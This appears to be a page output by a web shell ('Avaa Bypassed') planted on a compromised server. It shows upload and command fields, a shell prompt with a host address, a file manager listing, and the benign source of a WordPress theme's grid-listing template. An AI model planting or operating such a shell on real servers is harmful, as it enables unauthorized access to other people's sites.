[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@3.17.78.184: ~ $
<div id="post-<?php the_ID(); ?>" <?php post_class('col-sm-12 col-xs-12 blog-listing blog_listing_grid_two_column'); ?>>
	<main id="main" class="site-main">
		<article class="">
			<?php 
			if( has_post_thumbnail() ){ ?>    
	        	<figure class="post-thumbnail">
	        		<a href="<?php the_permalink(); ?>" class="post-thumbnail">
	        			<?php the_post_thumbnail( 'medium_large'); ?>       			
	        		</a>
	        	</figure>
	        	<?php 
	        } 

        	$category =  bizberg_post_categories( $post,2,false,false );
        	?>

        	<header class="entry-header <?php echo ( empty( $category ) ? 'no_category_post' : '' ); ?>">
            	<div class="entry-meta">
            		<span class="posted-on">
            			<?php esc_html_e( 'Added on' , 'bizberg' ); ?>  
	            		<a href="<?php echo esc_url( home_url() ); ?>/<?php echo esc_attr( date( 'Y/m' , strtotime( get_the_date() ) ) ); ?>">
	            			<time class="entry-date published"><?php echo esc_html( get_the_date() ); ?></time>
	            		</a>
	            	</span>
	            	<span class="category">
	            		<?php echo wp_kses_post( $category ); ?>
	            	</span>
	            </div>
	            <h2 class="entry-title">
	            	<a href="<?php the_permalink(); ?>">
	            		<?php the_title(); ?>
	            	</a>
	            </h2>        
	        </header> 
        	<div class="content-wrap">
        		<div class="entry-content">
        			<?php the_excerpt(); ?>
				</div>
			</div>
			<div class="entry-footer">
				<div class="button-wrap">
					<a href="<?php the_permalink(); ?>" class="btn-readmore">
						<?php esc_html_e( 'Read More' , 'bizberg' ); ?>  						
						<svg xmlns="http://www.w3.org/2000/svg" width="12" height="24" viewBox="0 0 12 24"><path d="M0,12,12,0,5.564,12,12,24Z" transform="translate(12 24) rotate(180)" fill="#121212"></path></svg>
					</a>
				</div>
			</div>
		</article>
	</main>
</div>

Filemanager

Name Type Size Permission Actions
content-detail.php File 2.45 KB 0644
content-detail2.php File 8.98 KB 0644
content-grid-two-column.php File 1.93 KB 0644
content-none.php File 1.23 KB 0644
content-nosidebar.php File 3.75 KB 0644
content-page-full.php File 469 B 0644
content-page.php File 1.49 KB 0644
content.php File 5.88 KB 0644